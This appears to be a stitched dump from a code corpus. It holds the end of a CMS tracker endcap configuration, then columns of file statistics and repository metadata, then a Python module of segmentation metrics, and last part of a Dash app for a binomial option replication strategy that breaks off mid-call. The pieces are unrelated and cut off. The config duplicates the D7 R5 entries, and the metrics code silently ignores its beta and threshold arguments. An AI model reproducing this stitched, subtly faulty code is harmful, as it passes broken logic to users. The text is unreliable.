cms.PSet(detSelection=cms.uint32(5381),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a1060")), # TEC+ D8 R3 back
cms.PSet(detSelection=cms.uint32(5382),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a2060")), # TEC+ D8 R3 front
# cms.PSet(detSelection=cms.uint32(5391),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a5060")), # TEC+ D9 R3 back
# cms.PSet(detSelection=cms.uint32(5392),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a6060")), # TEC+ D9 R3 front
cms.PSet(detSelection=cms.uint32(5411),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c085080")), # TEC+ D1 R4 back
cms.PSet(detSelection=cms.uint32(5412),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c086080")), # TEC+ D1 R4 front
cms.PSet(detSelection=cms.uint32(5421),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c089080")), # TEC+ D2 R4 back
cms.PSet(detSelection=cms.uint32(5422),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08a080")), # TEC+ D2 R4 front
cms.PSet(detSelection=cms.uint32(5431),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08d080")), # TEC+ D3 R4 back
cms.PSet(detSelection=cms.uint32(5432),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08e080")), # TEC+ D3 R4 front
cms.PSet(detSelection=cms.uint32(5441),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c091080")), # TEC+ D4 R4 back
cms.PSet(detSelection=cms.uint32(5442),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c092080")), # TEC+ D4 R4 front
cms.PSet(detSelection=cms.uint32(5451),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c095080")), # TEC+ D5 R4 back
cms.PSet(detSelection=cms.uint32(5452),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c096080")), # TEC+ D5 R4 front
cms.PSet(detSelection=cms.uint32(5461),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c099080")), # TEC+ D6 R4 back
cms.PSet(detSelection=cms.uint32(5462),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09a080")), # TEC+ D6 R4 front
cms.PSet(detSelection=cms.uint32(5471),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09d080")), # TEC+ D7 R4 back
cms.PSet(detSelection=cms.uint32(5472),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09e080")), # TEC+ D7 R4 front
cms.PSet(detSelection=cms.uint32(5481),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a1080")), # TEC+ D8 R4 back
cms.PSet(detSelection=cms.uint32(5482),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a2080")), # TEC+ D8 R4 front
cms.PSet(detSelection=cms.uint32(5491),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a5080")), # TEC+ D9 R4 back
cms.PSet(detSelection=cms.uint32(5492),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a6080")), # TEC+ D9 R4 front
cms.PSet(detSelection=cms.uint32(5511),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0850a0")), # TEC+ D1 R5 back
cms.PSet(detSelection=cms.uint32(5512),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0860a0")), # TEC+ D1 R5 front
cms.PSet(detSelection=cms.uint32(5521),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0890a0")), # TEC+ D2 R5 back
cms.PSet(detSelection=cms.uint32(5522),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08a0a0")), # TEC+ D2 R5 front
cms.PSet(detSelection=cms.uint32(5531),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08d0a0")), # TEC+ D3 R5 back
cms.PSet(detSelection=cms.uint32(5532),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08e0a0")), # TEC+ D3 R5 front
cms.PSet(detSelection=cms.uint32(5541),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0910a0")), # TEC+ D4 R5 back
cms.PSet(detSelection=cms.uint32(5542),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0920a0")), # TEC+ D4 R5 front
cms.PSet(detSelection=cms.uint32(5551),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0950a0")), # TEC+ D5 R5 back
cms.PSet(detSelection=cms.uint32(5552),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0960a0")), # TEC+ D5 R5 front
cms.PSet(detSelection=cms.uint32(5561),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0990a0")), # TEC+ D6 R5 back
cms.PSet(detSelection=cms.uint32(5562),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09a0a0")), # TEC+ D6 R5 front
cms.PSet(detSelection=cms.uint32(5571),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09d0a0")), # TEC+ D7 R5 back
cms.PSet(detSelection=cms.uint32(5572),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09e0a0")), # TEC+ D7 R5 front
cms.PSet(detSelection=cms.uint32(5571),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09d0a0")), # TEC+ D7 R5 back
cms.PSet(detSelection=cms.uint32(5572),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09e0a0")), # TEC+ D7 R5 front
cms.PSet(detSelection=cms.uint32(5581),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a10a0")), # TEC+ D8 R5 back
cms.PSet(detSelection=cms.uint32(5582),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a20a0")), # TEC+ D8 R5 front
cms.PSet(detSelection=cms.uint32(5591),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a50a0")), # TEC+ D9 R5 back
cms.PSet(detSelection=cms.uint32(5592),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a60a0")), # TEC+ D9 R5 front
cms.PSet(detSelection=cms.uint32(5611),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0850c0")), # TEC+ D1 R6 back
cms.PSet(detSelection=cms.uint32(5612),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0860c0")), # TEC+ D1 R6 front
cms.PSet(detSelection=cms.uint32(5621),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0890c0")), # TEC+ D2 R6 back
cms.PSet(detSelection=cms.uint32(5622),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08a0c0")), # TEC+ D2 R6 front
cms.PSet(detSelection=cms.uint32(5631),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08d0c0")), # TEC+ D3 R6 back
cms.PSet(detSelection=cms.uint32(5632),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08e0c0")), # TEC+ D3 R6 front
cms.PSet(detSelection=cms.uint32(5641),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0910c0")), # TEC+ D4 R6 back
cms.PSet(detSelection=cms.uint32(5642),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0920c0")), # TEC+ D4 R6 front
cms.PSet(detSelection=cms.uint32(5651),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0950c0")), # TEC+ D5 R6 back
cms.PSet(detSelection=cms.uint32(5652),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0960c0")), # TEC+ D5 R6 front
cms.PSet(detSelection=cms.uint32(5661),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0990c0")), # TEC+ D6 R6 back
cms.PSet(detSelection=cms.uint32(5662),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09a0c0")), # TEC+ D6 R6 front
cms.PSet(detSelection=cms.uint32(5671),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09d0c0")), # TEC+ D7 R6 back
cms.PSet(detSelection=cms.uint32(5672),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09e0c0")), # TEC+ D7 R6 front
cms.PSet(detSelection=cms.uint32(5681),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a10c0")), # TEC+ D8 R6 back
cms.PSet(detSelection=cms.uint32(5682),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a20c0")), # TEC+ D8 R6 front
cms.PSet(detSelection=cms.uint32(5691),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a50c0")), # TEC+ D9 R6 back
cms.PSet(detSelection=cms.uint32(5692),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a60c0")), # TEC+ D9 R6 front
cms.PSet(detSelection=cms.uint32(5711),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0850e0")), # TEC+ D1 R7 back
cms.PSet(detSelection=cms.uint32(5712),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0860e0")), # TEC+ D1 R7 front
cms.PSet(detSelection=cms.uint32(5721),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0890e0")), # TEC+ D2 R7 back
cms.PSet(detSelection=cms.uint32(5722),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08a0e0")), # TEC+ D2 R7 front
cms.PSet(detSelection=cms.uint32(5731),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08d0e0")), # TEC+ D3 R7 back
cms.PSet(detSelection=cms.uint32(5732),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08e0e0")), # TEC+ D3 R7 front
cms.PSet(detSelection=cms.uint32(5741),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0910e0")), # TEC+ D4 R7 back
cms.PSet(detSelection=cms.uint32(5742),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0920e0")), # TEC+ D4 R7 front
cms.PSet(detSelection=cms.uint32(5751),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0950e0")), # TEC+ D5 R7 back
cms.PSet(detSelection=cms.uint32(5752),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0960e0")), # TEC+ D5 R7 front
cms.PSet(detSelection=cms.uint32(5761),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0990e0")), # TEC+ D6 R7 back
cms.PSet(detSelection=cms.uint32(5762),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09a0e0")), # TEC+ D6 R7 front
cms.PSet(detSelection=cms.uint32(5771),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09d0e0")), # TEC+ D7 R7 back
cms.PSet(detSelection=cms.uint32(5772),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09e0e0")), # TEC+ D7 R7 front
cms.PSet(detSelection=cms.uint32(5781),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a10e0")), # TEC+ D8 R7 back
cms.PSet(detSelection=cms.uint32(5782),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a20e0")), # TEC+ D8 R7 front
cms.PSet(detSelection=cms.uint32(5791),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a50e0")), # TEC+ D9 R7 back
cms.PSet(detSelection=cms.uint32(5792),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a60e0")) # TEC+ D9 R7 front
)
)
| 138.300195
| 154
| 0.739598
| 9,196
| 70,948
| 5.706068
| 0.107656
| 0.062165
| 0.168734
| 0.195377
| 0.874678
| 0.874678
| 0.874107
| 0.852343
| 0.805652
| 0.016713
| 0
| 0.148745
| 0.089657
| 70,948
| 512
| 155
| 138.570313
| 0.663694
| 0.181386
| 0
| 0.009281
| 0
| 0
| 0.190595
| 0.153942
| 0
| 0
| 0.146612
| 0
| 0
| 1
| 0
| false
| 0
| 0.00232
| 0
| 0.00232
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d4f5d9ca3294c943db1622231a1679bba90eb7a9
| 6,089
|
py
|
Python
|
scripts_segtool/functional.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
scripts_segtool/functional.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
scripts_segtool/functional.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
import torch
def _take_channels(*xs, ignore_channels=None):
if ignore_channels is None:
return xs
else:
channels = [channel for channel in range(xs[0].shape[1]) if channel not in ignore_channels]
xs = [torch.index_select(x, dim=1, index=torch.tensor(channels).to(x.device)) for x in xs]
return xs
def _threshold(x, threshold=None):
if threshold is not None:
return (x > threshold).type(x.dtype)
else:
return x
def iou(pr, gt, eps=1e-7, threshold=None, ignore_channels=None, num_classes=None):
"""Calculate Intersection over Union between ground truth and prediction
Args:
pr (torch.Tensor): predicted tensor
gt (torch.Tensor): ground truth tensor
eps (float): epsilon to avoid zero division
threshold: threshold for outputs binarization
Returns:
float: IoU (Jaccard) score
"""
pr = _threshold(pr, threshold=threshold)
pr, gt = _take_channels(pr, gt, ignore_channels=ignore_channels)
if num_classes == None:
ious = []
for prs, gts in zip(pr, gt):
for pr, gt in zip(prs, gts):
intersection = torch.sum(gt * pr)
union = torch.sum(gt) + torch.sum(pr) - intersection
iou_score = intersection / (union + eps)
ious.append(iou_score)
return sum(ious) / len(ious)
else:
ious = [0.0] * num_classes
batch_size = len(pr)
for prs, gts in zip(pr, gt):
for i, pr, gt in zip(range(num_classes), prs, gts):
intersection = torch.sum(gt * pr)
union = torch.sum(gt) + torch.sum(pr) - intersection
iou_score = intersection / (union + eps)
ious[i] += iou_score / batch_size
return ious
jaccard = iou
def f_score(pr, gt, beta=1, eps=1e-7, threshold=None, ignore_channels=None, num_classes=None):
"""Calculate F-score between ground truth and prediction
Args:
pr (torch.Tensor): predicted tensor
gt (torch.Tensor): ground truth tensor
beta (float): positive constant
eps (float): epsilon to avoid zero division
threshold: threshold for outputs binarization
Returns:
float: F score
"""
pr = _threshold(pr, threshold=threshold)
pr, gt = _take_channels(pr, gt, ignore_channels=ignore_channels)
if num_classes == None:
scores = []
for prs, gts in zip(pr, gt):
for pr, gt in zip(prs, gts):
tp = torch.sum(gt * pr)
fp = torch.sum(pr) - tp
fn = torch.sum(gt) - tp
score = tp / ((tp + ((fp + fn) / 2)) + eps)
scores.append(score)
return sum(scores) / len(scores)
else:
scores = [0.0] * num_classes
batch_size = len(pr)
for prs, gts in zip(pr, gt):
for i, pr, gt in zip(range(num_classes), prs, gts):
tp = torch.sum(gt * pr)
fp = torch.sum(pr) - tp
fn = torch.sum(gt) - tp
score = tp / ((tp + ((fp + fn) / 2)) + eps)
scores[i] += score / batch_size
return scores
def accuracy(pr, gt, threshold=0.5, ignore_channels=None):
"""Calculate accuracy score between ground truth and prediction
Args:
pr (torch.Tensor): predicted tensor
gt (torch.Tensor): ground truth tensor
eps (float): epsilon to avoid zero division
threshold: threshold for outputs binarization
Returns:
float: precision score
"""
pr = _threshold(pr, threshold=threshold)
pr, gt = _take_channels(pr, gt, ignore_channels=ignore_channels)
tp = torch.sum(gt == pr, dtype=pr.dtype)
score = tp / gt.view(-1).shape[0]
return score
def precision(pr, gt, eps=1e-7, threshold=None, ignore_channels=None, num_classes=None):
"""Calculate precision score between ground truth and prediction
Args:
pr (torch.Tensor): predicted tensor
gt (torch.Tensor): ground truth tensor
eps (float): epsilon to avoid zero division
threshold: threshold for outputs binarization
Returns:
float: precision score
"""
if num_classes == None:
scores = []
for prs, gts in zip(pr, gt):
for pr, gt in zip(prs, gts):
tp = torch.sum(gt * pr)
fp = torch.sum(pr) - tp
score = tp / (tp + fp + eps)
scores.append(score)
return sum(scores) / len(scores)
else:
scores = [0.0] * num_classes
batch_size = len(pr)
for prs, gts in zip(pr, gt):
for i, pr, gt in zip(range(num_classes), prs, gts):
tp = torch.sum(gt * pr)
fp = torch.sum(pr) - tp
score = tp / (tp + fp + eps)
scores[i] += score / batch_size
return scores
def recall(pr, gt, eps=1e-7, threshold=None, ignore_channels=None, num_classes=None):
"""Calculate Recall between ground truth and prediction
Args:
pr (torch.Tensor): A list of predicted elements
gt (torch.Tensor): A list of elements that are to be predicted
eps (float): epsilon to avoid zero division
threshold: threshold for outputs binarization
Returns:
float: recall score
"""
if num_classes == None:
scores = []
for prs, gts in zip(pr, gt):
for pr, gt in zip(prs, gts):
tp = torch.sum(gt * pr)
fn = torch.sum(gt) - tp
score = tp / (tp + fn + eps)
scores.append(score)
return sum(scores) / len(scores)
else:
scores = [0.0] * num_classes
batch_size = len(pr)
for prs, gts in zip(pr, gt):
for i, pr, gt in zip(range(num_classes), prs, gts):
tp = torch.sum(gt * pr)
fn = torch.sum(gt) - tp
score = tp / (tp + fn + eps)
scores[i] += score / batch_size
return scores
| 36.461078
| 99
| 0.561176
| 793
| 6,089
| 4.238335
| 0.113493
| 0.032133
| 0.04463
| 0.032133
| 0.804522
| 0.792919
| 0.792919
| 0.792919
| 0.784885
| 0.752752
| 0
| 0.006399
| 0.332731
| 6,089
| 167
| 100
| 36.461078
| 0.820822
| 0.243718
| 0
| 0.773585
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066038
| false
| 0
| 0.009434
| 0
| 0.198113
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be0d5dc3943b29ff4333db5245561705074c34cf
| 34,296
|
py
|
Python
|
app.py
|
MichelVanderhulst/eu-option-crr
|
718d73d336289368c6f10bf97805bf12e6c6ec6f
|
[
"MIT"
] | null | null | null |
app.py
|
MichelVanderhulst/eu-option-crr
|
718d73d336289368c6f10bf97805bf12e6c6ec6f
|
[
"MIT"
] | null | null | null |
app.py
|
MichelVanderhulst/eu-option-crr
|
718d73d336289368c6f10bf97805bf12e6c6ec6f
|
[
"MIT"
] | null | null | null |
# Dash app libraries
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
import dash_bootstrap_components as dbc
import plotly.graph_objs as go
import base64
# Importing app header, body and graphs from the other .py scripts
from appBody import body, graphs
from appHeader import header
# Rep strat math script
from EU_Option_CRR_GRW import *
from inputDescriptions import list_input
# Allowing excel export
import os
import pandas as pd
import io
from dash_extensions import Download
from dash_extensions.snippets import send_bytes
app = dash.Dash(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP], #modern-looking buttons, sliders, etc
external_scripts=['https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.4/MathJax.js?config=TeX-MML-AM_CHTML', "./assets/mathjax.js"], #LaTeX in app
meta_tags=[{"content": "width=device-width"}] #app width adapts itself to user device
)
server = app.server
# Building the app from imports
app.layout = html.Div(
id='main_page',
children=[
dcc.Store(id='memory-output'),
header(),
body(),
graphs(),
],
)
# App interactivity: calling the replication strategy function everytime the user changes an input
@app.callback(
Output('memory-output', 'data'),
[Input('CallOrPut', 'value'),
Input("S","value"),
Input("K", "value"),
Input("Rf", "value"),
Input("T","value"),
Input("mu","value"),
Input("vol", "value"),
Input("tree_periods", "value")])
def get_rep_strat_data(CallOrPut, S, K, Rf,T,mu,vol,tree_periods):
nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel, edge_x, edge_y, node_x, node_y, u, d, probUp, probDown, edge_y_Stock, node_y_Stock, edge_y_Intrinsic, node_y_Intrinsic, edge_y_Optionprice, node_y_Optionprice, edge_y_Portfolio, node_y_Portfolio, edge_y_Cash, node_y_Cash, edge_y_NbrOfShares, node_y_NbrOfShares, tree__periods = RepStrat_EU_Option_CRR_GRW(CallOrPut, S, K, Rf, T, mu, vol, tree_periods)
return nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel, edge_x, edge_y, node_x, node_y, u, d, probUp, probDown, edge_y_Stock, node_y_Stock, edge_y_Intrinsic, node_y_Intrinsic, edge_y_Optionprice, node_y_Optionprice, edge_y_Portfolio, node_y_Portfolio, edge_y_Cash, node_y_Cash, edge_y_NbrOfShares, node_y_NbrOfShares, tree__periods
# Plot of stock simulation
@app.callback(
Output('stock_simul', 'figure'),
[Input('memory-output', 'data'),
Input("GraphType","value")])
def graph_stock_simul(data, value):
nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel, edge_x, edge_y, node_x, node_y, u, d, probUp, probDown, edge_y_Stock, node_y_Stock, edge_y_Intrinsic, node_y_Intrinsic, edge_y_Optionprice, node_y_Optionprice, edge_y_Portfolio, node_y_Portfolio, edge_y_Cash, node_y_Cash, edge_y_NbrOfShares, node_y_NbrOfShares, tree__periods = data
if value == "tree":
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
#margin={"t":15},
margin=dict(
l=0,
#r=50,
#b=100,
t=15,
#pad=4
),
# showlegend=False,
xaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,}, # numbers below}
yaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,}, # numbers below}
legend=dict(
x=0,
y=1,
traceorder='normal',
bgcolor='rgba(0,0,0,0)'),
),
'data': [go.Scatter(x=edge_x,
y=edge_y,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
showlegend=False,
),
go.Scatter(
x=node_x,
y=node_y,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in stocksLabel],
showlegend=False,
hoverinfo='none',
),
go.Scatter(
x=[None],
y=[None],
mode='markers',
name=f'Up factor: {u}'
),
go.Scatter(
x=[None],
y=[None],
mode='markers',
name=f'Down factor: {d}'
),
go.Scatter(
x=[None],
y=[None],
mode='markers',
name=f'Prob up: {probUp}'
),
go.Scatter(
x=[None],
y=[None],
mode='markers',
name=f'Prob down: {probDown}'
),
],
}
else:
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
margin=dict(l=0, t=15),
xaxis={'showgrid': True,
'zeroline': False,
'visible': True,
"title":"Periods"},
yaxis={'showgrid': True, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': True,
"autorange":True,
"ticks":"outside",
"title":"USD"}, # numbers below}
legend=dict(x=0,
y=1,
traceorder='normal',
bgcolor='rgba(0,0,0,0)'
),
hovermode="closest",
),
'data': [go.Scatter(x=edge_x,
y=edge_y_Stock,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
showlegend=False,
),
go.Scatter(x=node_x,
y=node_y_Stock,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in stocksLabel],
showlegend=False,
hoverinfo="none",
),
go.Scatter(
x=[None],
y=[None],
mode='markers',
name=f'Up factor: {u}'
),
go.Scatter(
x=[None],
y=[None],
mode='markers',
name=f'Down factor: {d}'
),
go.Scatter(
x=[None],
y=[None],
mode='markers',
name=f'Prob up: {probUp}'
),
go.Scatter(
x=[None],
y=[None],
mode='markers',
name=f'Prob down: {probDown}'
),
],
}
# Plot of rep strat portfolio
@app.callback(
Output('port_details', 'figure'),
[Input('memory-output', 'data'),
Input("GraphType","value")])
def graph_portfolio(data, value):
nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel, edge_x, edge_y, node_x, node_y, u, d, probUp, probDown, edge_y_Stock, node_y_Stock, edge_y_Intrinsic, node_y_Intrinsic, edge_y_Optionprice, node_y_Optionprice, edge_y_Portfolio, node_y_Portfolio, edge_y_Cash, node_y_Cash, edge_y_NbrOfShares, node_y_NbrOfShares, tree__periods = data
if value == "tree":
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
showlegend=False,
margin=dict(
l=0,
#r=50,
#b=100,
t=15,
#pad=4
),
xaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"Periods"}, # numbers below}
yaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"USD"}, # numbers below}} # numbers below}
),
'data': [go.Scatter(x=edge_x,
y=edge_y,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
),
go.Scatter(x=node_x,
y=node_y,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in portfolioLabel],
hoverinfo='none',
),
],
}
else:
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
margin=dict(l=0, t=15),
xaxis={'showgrid': True,
'zeroline': False,
'visible': True,
"title":"Periods"},
yaxis={'showgrid': True, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': True,
"autorange":True,
"ticks":"outside",
"title":"USD"}, # numbers below}
legend=dict(x=0,
y=1,
traceorder='normal',
bgcolor='rgba(0,0,0,0)'
),
hovermode="closest",
),
'data': [go.Scatter(x=edge_x,
y=edge_y_Portfolio,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
showlegend=False,
),
go.Scatter(x=node_x,
y=node_y_Portfolio,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in portfolioLabel],
showlegend=False,
hoverinfo="none",
),
],
}
# Plot of number of shares to hold
@app.callback(
Output('nbr_shares', 'figure'),
[Input('memory-output', 'data'),
Input("GraphType","value")])
def graph_numberShares(data, value):
nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel, edge_x, edge_y, node_x, node_y, u, d, probUp, probDown, edge_y_Stock, node_y_Stock, edge_y_Intrinsic, node_y_Intrinsic, edge_y_Optionprice, node_y_Optionprice, edge_y_Portfolio, node_y_Portfolio, edge_y_Cash, node_y_Cash, edge_y_NbrOfShares, node_y_NbrOfShares, tree__periods = data
if value == "tree":
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
showlegend=False,
margin=dict(l=0,
#r=50,
#b=100,
t=15,
#pad=4
),
xaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"Periods"}, # numbers below}
yaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"Periods"} # numbers below}
),
'data': [go.Scatter(x=edge_x,
y=edge_y,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
),
go.Scatter(x=node_x,
y=node_y,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in nbrofsharesLabel],
hoverinfo='none',
),
],
}
else:
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
margin=dict(l=0, t=15),
xaxis={'showgrid': True,
'zeroline': False,
'visible': True,
"title":"Periods"},
yaxis={'showgrid': True, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': True,
"autorange":True,
"ticks":"outside",
"title":"# Shares"}, # numbers below}
legend=dict(x=0,
y=1,
traceorder='normal',
bgcolor='rgba(0,0,0,0)'
),
hovermode="closest",
),
'data': [go.Scatter(x=edge_x,
y=edge_y_NbrOfShares,
mode='lines',
line=dict(width=0.5),
